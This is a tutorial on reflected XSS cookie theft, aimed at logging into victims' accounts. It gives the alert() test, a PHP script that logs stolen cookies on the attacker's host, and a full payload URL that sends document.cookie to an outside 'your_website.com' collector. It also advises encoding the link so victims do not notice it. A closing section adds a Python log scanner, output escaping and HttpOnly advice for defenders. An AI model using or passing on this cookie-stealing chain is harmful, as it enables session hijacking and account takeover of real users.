Introduction

This method (XSS attacks) is for getting users' cookies, and with them the users' information, so that you can then log in to the victim user's account. You will have to give an address to the admin or to the user whose account you want to enter.

What must a website have so it can be hacked with the XSS method?

- A search
- The website must use cookies*

* Cookies info: http://en.wikipedia.org/wiki/Internet_cookie

An example: learning the XSS attack method...

- Now we already know what a cookie is, so we are going to find/view the file that has the search, for example: search.php

- Then, HOW TO KNOW IF THE SEARCH CAN BE EXPLOITED BY AN XSS ATTACK, AND AFTER THAT WHETHER THE WEBSITE CAN BE HACKED?

We have to put this in the search:

Code:
<script>alert()</script>

If a script alert appears, it's vulnerable!! If no alert appears, it IS NOT vulnerable.

~~~~~~~~~~~~~~~~~~~~~~~~~~

Then, if the website is vulnerable (the script alert appears), we're going to exploit it!

- Step 1

Find the textbox's name and the search button's name (to see them, view the page's source). An example:

Code:
<input type="text" name="word">

This is an example of the source of the search textbox. So the textbox's name would be: word (name="word")

Code:
<input type="submit" name="search" value="Search">

This is an example of the source of the search button. So the button's name would be: search (name="search")

(For this you need a little knowledge of HTML.)

- Step 2

Now we know that the textbox is named word and the button is named search.

[Keeping the cookies]

To keep the cookies we have 2 ways/options: keep the cookies in a database (db), or keep the cookies in a text file (easier). We're going to keep the cookies in a text file.

Then we're going to create a PHP file, for example cookies.php, with this source:

Code:
<?php
// Take the value of the "cookie" URL parameter and append it to file.txt
$cookie = $_GET['cookie'];
$fff = fopen("file.txt", "a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>

UPLOAD IT TO YOUR HOST!
This file will create another file (file.txt). When somebody enters http://urwebsite.com/cookies.php (so upload cookies.php to your host), their cookies will be kept in file.txt.

file.txt: this file will be created automatically, and the victim user's cookie will be kept in it.

EXPLOITING THE BUG.....

To get the cookies of the user you want, you must give an address to the 'victim'. The victim will enter the address, and this address will redirect the victim to your host, to cookies.php, which keeps their cookies in file.txt.

The address you must give to the victim to get their cookies:

Code:
http://www.vulnerable_wepage_victim.com/search.php?word=<script>window.location='http://www.your_website.com/cookies.php?cookie='+document.cookie;</script>&Search=;

http://www.vulnerable_wepage_victim.com/
The victim website, which has a search, uses cookies and is vulnerable.

search.php
The file that contains the search.

?word=
The name of the textbox (word). If the name of the textbox was "palabra", it would be: ?palabra=

<script>window.location='http://www.your_website.com/cookies.php?cookie='+document.cookie;</script>
The source that redirects the victim to cookies.php and gets their cookies.

&Search=;
The name of the button. If the name of the button was "buscar", it would be: &buscar=;

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I repeat: to get the user's cookies you must give them the address, but this address looks 'suspicious', so I recommend encoding it. I leave you this address: http://www.ascii.cl/es/ (you will need it to encode the address). It will encode it this way:

Code:
word=<script>...

to

Code:
%70%61%6C%61%62%72%61%3D%3C%73%63%72%69%70%74%3E...

etc.
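The defender's side of the two points above, as an added example that is not part of the original post: a small Python script that scans web-server access-log lines for the `search.php?word=<script>...document.cookie` request pattern, percent-decoding the query first so the encoded form from the last step is caught as well, and that shows how escaping the echoed search term (the equivalent of PHP's htmlspecialchars) stops the alert() test from firing. The log lines, client IPs and the host example.invalid are constructed for the example.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed web-server log lines (not from the original post). The second
# line carries the raw payload from the tutorial, the third the same payload
# percent-encoded the way the last step describes.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /search.php?word=shoes&search= HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /search.php?word=<script>window.location='http://example.invalid/cookies.php?cookie='+document.cookie;</script>&search= HTTP/1.1" 200 700
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /search.php?word=%3Cscript%3Ewindow.location%3D%27http%3A%2F%2Fexample.invalid%2Fcookies.php%3Fcookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E&search= HTTP/1.1" 200 700
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Substrings that together mark the cookie-theft payload shown above.
INDICATORS = ("<script", "document.cookie", "window.location")


def decoded_query(path: str) -> dict:
    """Split the query string and percent-decode every value twice,
    so a single- or double-URL-encoded payload looks like the raw one."""
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    return {k: [unquote(unquote(v)) for v in vals] for k, vals in params.items()}


def flag_requests(log_text: str) -> list:
    """Return (client_ip, parameter, decoded_value) for every request whose
    query string carries one of the indicators."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        for name, values in decoded_query(m.group(1)).items():
            for value in values:
                if any(ind in value.lower() for ind in INDICATORS):
                    hits.append((client_ip, name, value))
    return hits


def render_results(word: str, escape: bool = True) -> str:
    """Echo the search term back into the page. escape=True is the fix
    (same effect as PHP's htmlspecialchars); escape=False reproduces the bug."""
    shown = html.escape(word, quote=True) if escape else word
    return f"<p>Results for: {shown}</p>"
```

Pair the output escaping with the HttpOnly flag on the session cookie, which keeps document.cookie from exposing it even if a reflection slips through.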